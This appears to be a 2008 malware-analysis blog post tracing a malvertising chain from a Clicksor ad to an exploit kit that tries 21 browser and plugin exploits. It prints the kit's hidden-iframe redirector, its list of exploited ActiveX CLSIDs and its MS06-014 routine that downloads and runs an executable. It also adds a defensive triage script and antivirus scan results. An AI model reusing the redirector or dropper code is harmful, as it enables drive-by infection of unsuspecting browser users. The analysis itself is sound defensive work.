<h4>
winqIMs2d.exe - load.exe / Clicksor advertising - 21 exploits
</h4>
Clicksor advertising is back in the malware section tonight. We saw the same ad network earlier in the campaigns featuring xrun.exe - xpre.exe / ya-tracker.com and flashwrite_1_2.js / byronadvertising.eu (multiple references, members only).

<h4>
Starting point at Clicksor
</h4>
creative.clicksor.com/network_1/67692/c203377991.html
CODE
<script type="text/javascript" src="http://ads.myadslink.com/ads/random_ads.js"></script></body></html>
<h4>
ads.myadslink.com
</h4>
ads.myadslink.com/ads/random_ads.js - As usual the script is a blob of obfuscated junk ... sorry, JavaScript ...
Decoded, it writes a hidden iframe that pulls in secure.sessioncheck.net:
CODE
<script language=javascript>
// status-bar tricks: show the current URL, then "Done", so the loading of the
// hidden frame never shows up in the browser status bar
status=location;
window.status="Done";
// 0x0, CSS-hidden iframe; the URL of the hosting page rides along in ?ref=
document.write('<iframe src="http://secure.sessioncheck.net/routine/?ref='+window.location+'" width=0 height=0 frameborder=0 style="display:none; visibility: hidden" onLoad="status=defaultStatus;"></iframe>');
</script>

Note: window.location is the URL of the page that loaded random_ads.js (here the Clicksor creative), so it ends up in the ref= query string and, since that page is the iframe's parent, in the Referer header as well. In our case the iframe therefore requests:
CODE
http://secure.sessioncheck.net/routine/?ref=http://creative.clicksor.com/network_1/67692/c203377991.html
<h4>
secure.sessioncheck.net or 21 exploits to screw your PC
</h4>
It's rather common to package more than one exploit in a malicious JavaScript page and try all of them against the visiting browser. But hey, 21 different exploits in the same script? The calls are chained with ||, so evaluation stops at the first routine that reports success (Go() below returns 1 once the payload has been launched) and the remaining ones are never tried. The list that follows maps the 21 calls to 20 components: ya1() and ya2() are the two Yahoo! Messenger CLSIDs under 4.
CODE
if (
mdac() ||
office() ||
dl() ||
pdf() ||
wme() ||
wfi() ||
com() ||
ya1() ||
ya2() ||
fb() ||
mdss() ||
creative() ||
wks() ||
ogame() ||
ca() ||
buddy() ||
gomweb() ||
xmlcore() ||
quick() ||
real() ||
ntaudio()
)   { }
  1. mdac (MS06-014)
    • BD96C556-65A3-11D0-983A-00C04FC29E36
    • BD96C556-65A3-11D0-983A-00C04FC29E30
    • AB9BCEDD-EC7E-47E1-9322-D4A210617116
    • 0006F033-0000-0000-C000-000000000046
    • 0006F03A-0000-0000-C000-000000000046
    • 6e32070a-766d-4ee6-879c-dc1fa91d2fc3
    • 6414512B-B978-451D-A0D8-FCFDF33E833C
    • 7F5B7F63-F06F-4331-8A26-339E03C0AE3D
    • 06723E09-F4C2-43c8-8358-09FCD1DB0766
    • 639F725F-1B2D-4831-A9FD-874847682010
    • BA018599-1DB3-44f9-83B4-461454C84BF8
    • D0C07D56-7C69-43F1-B4A0-25F5A11FAB19
    • E8CCCDDF-CA28-496b-B050-6C07C962476B
  2. WebViewFolder setSlice - WebViewFolderIcon.WebViewFolderIcon.1
  3. CreateControlRange - Microsoft 'msdds.dll' COM Object - EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (MS05-052)
  4. Yahoo! Messenger 8.x ActiveX
    • DCE2F8B1-A520-11D4-8FD0-00D0B7730277
    • 9D39223E-AE8E-11D4-8FD3-00D0B7730277
  5. FaceBook/Aurigma Image/PhotoUploader Buffer Overflow - 5C6698D9-7BE4-4122-8EC5-291D84DBD4A0
  6. Microsoft Speech API ActiveX - EEE78591-FE22-11D0-8BEF-0060081841DE
  7. Microsoft Office Snapshot Viewer ActiveX - snpvw.Snapshot Viewer Control.1
  8. Sina Downloader.DLoader.1
  9. WksPictureInterface - 00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6
  10. Ourgame IEStartNative - F917534D-535B-416B-8E8F-0C04756C31A8
  11. CA AddColumn - BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3
  12. SuperBuddy LinkSBIcons - Sb.SuperBuddy
  13. GomPlayer OpenURL - GomWebCtrl.GomManager.1
  14. XMLHTTP setRequestHeader - 88d969c5-f192-11d4-a65f-0040963251e5
  15. QuickTime RTSP - QuickTime.QuickTime.4
  16. RealPlayer Console - IERPCtl.IERPCtl.1
  17. NCTAudioFile2 - 77829F14-D911-40FF-A2F0-D11DB8D6D0BC
  18. Creative CacheFolder - 0A5FD7C5-A45C-49FC-ADB5-9952547D5715
  19. collab.CollabEmailInfo - PDF exploit
  20. Windows Media Encoder - A8D3AD02-7508-4004-B2E9-AD33F087F43C
A closer look at the mdac routine shows the classic MS06-014 download-and-execute: the vulnerable MDAC object is used to instantiate XMLHTTP to fetch the payload, ADODB.Stream to write it to the temp folder and Shell.Application to run it.
CODE
// CreateO(a, progid) and url are defined elsewhere in the kit (not reproduced
// here): a is the MDAC object, url the payload location.
function Go(a)
{
   var eurl=url;
   var fname="winqIMs2d.exe";
   var fso=CreateO(a,"Scripting.FileSystemObject")
   var sap=CreateO(a,"Shell.Application");
   var x=CreateO(a,"ADODB.Stream");
   var nl=null;
   // GetSpecialFolder(2) is the temp folder: the payload lands in %TEMP%
   fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
   x.Mode=3;   // adModeReadWrite
   // four attempts at getting an HTTP client; the split string literal keeps
   // the ProgID out of naive pattern matching
   try
   {
     nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");
     nl.open("GET",eurl,false);
   }
   catch(e)
   {
     try
     {
       nl=CreateO(a,"MSXML2.XMLHTTP");
       nl.open("GET",eurl,false);
     }
     catch(e)
     {
       try
       {
         nl=CreateO(a,"MSXML2.ServerXMLHTTP");
         nl.open("GET",eurl,false);
       }
       catch(e)
       {
         try
         {
           nl=new XMLHttpRequest();
           nl.open("GET",eurl,false);
         }
         catch(e)
         {
           return 0;   // falsy: the || chain moves on to the next exploit
         }
       }
     }
   }
   x.Type=1;   // adTypeBinary
   nl.send(null);
   rb=nl.responseBody;
   x.Open();
   x.Write(rb);
   x.SaveTofile(fname,2);    // 2 = adSaveCreateOverWrite
   sap.ShellExecute(fname);  // launch the dropped executable
   return 1;                 // truthy: the || chain stops here
}
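The two pieces above, the hidden-iframe redirector served from ads.myadslink.com and the download-and-execute routine of the mdac exploit, are exactly what you want to triage quickly when the next obfuscated ad script lands on your desk. The script below is an added example, not code from the write-up or from the kit: it undoes the "Micr"+"osoft.XMLH"+"TTP"-style literal splitting, extracts ActiveX CLSIDs and ProgIDs, flags 0x0 or CSS-hidden iframes and the XMLHTTP -> ADODB.Stream -> ShellExecute chain, and emits a kill-bit .reg fragment for every CLSID it finds. The CLSID labels are a subset of the list above; the sample input is constructed from the snippets quoted on this page, and the way the real kit hands its CLSID to CreateO() is assumed since the page does not show it.

```javascript
'use strict';
// Added example: offline triage of a captured exploit-kit script.
// Nothing here touches the network; run it with node.

// Labels taken from the write-up's own exploit list (a subset). CLSIDs not in
// this table are still reported and still get a kill bit.
const KNOWN_CLSIDS = {
  'BD96C556-65A3-11D0-983A-00C04FC29E36': 'mdac (MS06-014)',
  'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F': 'msdds.dll (MS05-052)',
  '5C6698D9-7BE4-4122-8EC5-291D84DBD4A0': 'FaceBook/Aurigma ImageUploader',
  '88D969C5-F192-11D4-A65F-0040963251E5': 'XMLHTTP setRequestHeader',
  'A8D3AD02-7508-4004-B2E9-AD33F087F43C': 'Windows Media Encoder',
};

const CLSID_RE = /\b[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\b/gi;
// String literal handed to ActiveXObject() or to a CreateO(obj, "ProgID")-style helper.
const PROGID_RE = /\b(?:ActiveXObject|CreateO)\s*\(\s*(?:\w+\s*,\s*)?['"]([A-Za-z0-9_. ]+)['"]/g;
const IFRAME_RE = /<iframe\b[^>]*>/gi;

// "Micr"+"osoft.XMLH"+"TTP" -> "Microsoft.XMLHTTP": join adjacent literals glued with +
function unconcat(src) {
  return src.replace(/"\s*\+\s*"|'\s*\+\s*'/g, '');
}

function extractClsids(src) {
  return [...new Set((src.match(CLSID_RE) || []).map((m) => m.toUpperCase()))];
}

function extractProgIds(src) {
  const out = new Set();
  PROGID_RE.lastIndex = 0;
  for (let m; (m = PROGID_RE.exec(src)) !== null; ) out.add(m[1]);
  return [...out];
}

// Zero-sized or CSS-hidden iframes. Returns each src up to the first quote, so a
// src built by string concatenation (as in the redirector) still yields the host.
function hiddenIframes(src) {
  const found = [];
  for (const tag of src.match(IFRAME_RE) || []) {
    const t = tag.toLowerCase();
    const zero = /\bwidth\s*=\s*["']?0\b/.test(t) && /\bheight\s*=\s*["']?0\b/.test(t);
    const css = /display\s*:\s*none|visibility\s*:\s*hidden/.test(t);
    if (!zero && !css) continue;
    const m = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(tag);
    found.push(m ? m[1] : '(no static src)');
  }
  return found;
}

// The three stages of Go(): fetch, write to disk, execute. All three together
// is the download-and-execute signature; any one alone is only a hint.
function downloadExecChain(src) {
  const fetch = /XMLHTTP|XMLHttpRequest/i.test(src);
  const write = /ADODB\.Stream/i.test(src) && /SaveToFile/i.test(src);
  const exec = /Shell\.Application|ShellExecute|WScript\.Shell/i.test(src);
  return { fetch, write, exec, complete: fetch && write && exec };
}

// Kill bit: Compatibility Flags = 0x400 under ActiveX Compatibility makes
// Internet Explorer refuse to instantiate the control. This closes the vector
// in the browser; it does not patch the vulnerable software itself.
function killBitReg(clsids) {
  const lines = ['Windows Registry Editor Version 5.00', ''];
  for (const id of clsids) {
    lines.push(`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{${id}}]`);
    lines.push('"Compatibility Flags"=dword:00000400', '');
  }
  return lines.join('\r\n');
}

function triage(rawSrc) {
  const src = unconcat(rawSrc);
  const clsids = extractClsids(src);
  return {
    clsids: clsids.map((id) => ({ id, name: KNOWN_CLSIDS[id] || 'unknown' })),
    progids: extractProgIds(src),
    hiddenIframes: hiddenIframes(src),
    downloadExec: downloadExecChain(src),
    killBitReg: killBitReg(clsids),
  };
}

// Constructed sample: the decoded redirector and a trimmed copy of the mdac
// routine quoted above. The clsid variable is an assumption; the page does not
// show how the kit passes the CLSID to CreateO().
const SAMPLE = `
document.write('<iframe src="http://secure.sessioncheck.net/routine/?ref='+window.location+'" width=0 height=0 frameborder=0 style="display:none; visibility: hidden"></iframe>');
var clsid = "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";
var fso=CreateO(a,"Scripting.FileSystemObject"); var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream"); var nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");
nl.open("GET",url,false); nl.send(null); x.Write(nl.responseBody); x.SaveTofile(fname,2); sap.ShellExecute(fname);
`;

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

Pipe the decoded script in place of SAMPLE and the report gives you the controls to kill-bit, the host the hidden frame talks to and whether the script drops and runs a file. The regexes are deliberately loose; a kit that builds ProgIDs from char codes or eval() will need real deobfuscation first, which is why the result of unconcat() is what gets scanned rather than the raw text.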
<h4>
File details
</h4>

File winqIMs2d.exe received on 11.21.2008 19:19:06 (CET) - 17 of 37 engines flag it
Antivirus / Version / Last update / Result
AhnLab-V3 2008.11.21.0 2008.11.21 -
AntiVir 7.9.0.35 2008.11.21 DR/Delphi.Gen
Authentium 5.1.0.4 2008.11.21 -
Avast 4.8.1281.0 2008.11.21 Win32:Delf-GNA
AVG 8.0.0.199 2008.11.21 Downloader.Delf.BLD
BitDefender 7.2 2008.11.21 Trojan.Dropper.Delf.Crypt.C
CAT-QuickHeal 10.00 2008.11.21 -
ClamAV 0.94.1 2008.11.21 -
DrWeb 4.44.0.09170 2008.11.21 Trojan.MulDrop.19553
eSafe 7.0.17.0 2008.11.19 -
eTrust-Vet 31.6.6221 2008.11.21 Win32/Injecslen
Ewido 4.0 2008.11.21 -
F-Prot 4.4.4.56 2008.11.21 -
F-Secure 8.0.14332.0 2008.11.21 -
Fortinet 3.117.0.0 2008.11.21 PossibleThreat
GData 19 2008.11.21 Trojan.Dropper.Delf.Crypt.C
Ikarus T3.1.1.45.0 2008.11.21 Win32.SuspectCrc
K7AntiVirus 7.10.530 2008.11.21 Trojan.Win32.Malware.1
Kaspersky 7.0.0.125 2008.11.21 -
McAfee 5440 2008.11.20 -
McAfee+Artemis 5440 2008.11.20 Generic!Artemis
Microsoft 1.4104 2008.11.21 VirTool:Win32/DelfInject.gen!T
NOD32 3631 2008.11.21 -
Norman 5.80.02 2008.11.21 W32/Malware.EMNJ
Panda 9.0.0.4 2008.11.20 -
PCTools 4.4.2.0 2008.11.21 -
Prevx1 V2 2008.11.21 -
Rising 21.04.42.00 2008.11.21 Trojan.Win32.Delf.fix
SecureWeb-Gateway 6.7.6 2008.11.21 Trojan.Dropper.Delphi.Gen
Sophos 4.35.0 2008.11.21 -
Sunbelt 3.1.1823.2 2008.11.21 -
Symantec 10 2008.11.21 -
TheHacker 6.3.1.1.159 2008.11.19 -
TrendMicro 8.700.0.1004 2008.11.21 TROJ_DELF.FPX
VBA32 3.12.8.9 2008.11.20 Trojan-Downloader.Win32.Delf.lre
ViRobot 2008.11.18.1474 2008.11.18 -
VirusBuster 4.5.11.0 2008.11.21 -

Additional information
File size: 60928 bytes
MD5...: 1707857069e97a26cd8d598a84be099c
SHA1..: 3f3b6699a38af01e524679946efdff3931e01ae7
SHA256: 7afadeceea4fd02ffd7e669645c2e0274cfabbfdc1f0cb757db394953e79144e
PEiD..: -

______________________________


File 1.pdf received on 11.21.2008 19:18:08 (CET) - 12 of 37 engines flag it
Antivirus / Version / Last update / Result
AhnLab-V3 2008.11.21.0 2008.11.21 -
AntiVir 7.9.0.35 2008.11.21 JS/Dldr.Small.CR.2
Authentium 5.1.0.4 2008.11.21 -
Avast 4.8.1281.0 2008.11.21 -
AVG 8.0.0.199 2008.11.21 -
BitDefender 7.2 2008.11.21 Trojan.JS.Downloader.BGI
CAT-QuickHeal 10.00 2008.11.21 -
ClamAV 0.94.1 2008.11.21 -
DrWeb 4.44.0.09170 2008.11.21 Exploit.PDF.4
eSafe 7.0.17.0 2008.11.19 -
eTrust-Vet 31.6.6221 2008.11.21 -
Ewido 4.0 2008.11.21 -
F-Prot 4.4.4.56 2008.11.21 -
F-Secure 8.0.14332.0 2008.11.21 Exploit.JS.Pdfka.w
Fortinet 3.117.0.0 2008.11.21 -
GData 19 2008.11.21 Trojan.JS.Downloader.BGI
Ikarus T3.1.1.45.0 2008.11.21 Exploit.Win32.Pdfjsc.G
K7AntiVirus 7.10.530 2008.11.21 -
Kaspersky 7.0.0.125 2008.11.21 -
McAfee 5440 2008.11.20 Exploit-PDF.f
McAfee+Artemis 5440 2008.11.20 Exploit-PDF.f
Microsoft 1.4104 2008.11.21 Exploit:Win32/Pdfjsc.G
NOD32 3631 2008.11.21 -
Norman 5.80.02 2008.11.21 -
Panda 9.0.0.4 2008.11.20 -
PCTools 4.4.2.0 2008.11.21 -
Prevx1 V2 2008.11.21 -
Rising 21.04.42.00 2008.11.21 -
SecureWeb-Gateway 6.7.6 2008.11.21 Script.Dldr.Small.CR.2
Sophos 4.35.0 2008.11.21 Mal/PDFEx-B
Sunbelt 3.1.1823.2 2008.11.21 -
Symantec 10 2008.11.21 Bloodhound.Exploit.196
TheHacker 6.3.1.1.159 2008.11.19 -
TrendMicro 8.700.0.1004 2008.11.21 -
VBA32 3.12.8.9 2008.11.20 -
ViRobot 2008.11.18.1474 2008.11.18 -
VirusBuster 4.5.11.0 2008.11.21 -

Additional information
File size: 2836 bytes
MD5...: caa6b944c49563d2b5be8b290ed66e37
SHA1..: bbb37815ad46e070fc697f849af2779588904cc8
SHA256: aff3ad344dbe128941fa43eb907ca35dba4b7fddf1459ca368c2f33f16e575bd
PEiD..: -
TrID..: File type identification: Adobe Portable Document Format (100.0%)
PEInfo: -
<h4>
IP details
</h4>
ads.myadslink.com - 72.233.33.210

Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Name Server: NS1.IDNSNET.NET
Name Server: NS2.IDNSNET.NET
Updated Date: 29-oct-2008
Creation Date: 29-oct-2008

Registrant:
Organization : Zhichaoe Fung
Name : Zhichaoe Fung
Address : Nanxixinyuan Rd. 27, No. 3, 1F, Apt. 1903
City : aomentebiexingzhengqu
Province/State : aomentebiexingzhengqu
Country : aomentebiexingzhengqu (pinyin for Macau Special Administrative Region, repeated in all three fields)
Postal Code : 200000
______________________________

secure.sessioncheck.net - 72.233.33.210 (same IP and same name servers as ads.myadslink.com, registered one week earlier)

Registrar: CHEAPIES.COM INC.
Whois Server: whois.cheapies.com
Name Server: NS1.IDNSNET.NET
Name Server: NS2.IDNSNET.NET
Updated Date: 22-oct-2008
Creation Date: 22-oct-2008

Registered at Cheapies.Com
Privacy Domain
599-B Yonge St #511
Toronto, ON
M4Y 1Z4
Canada
Tel: 1.8667077633
Fax: 1.4169461794
Email: privacy@cheapies.com

Still lovin' JavaScript and all the Web Browser Add-Ons?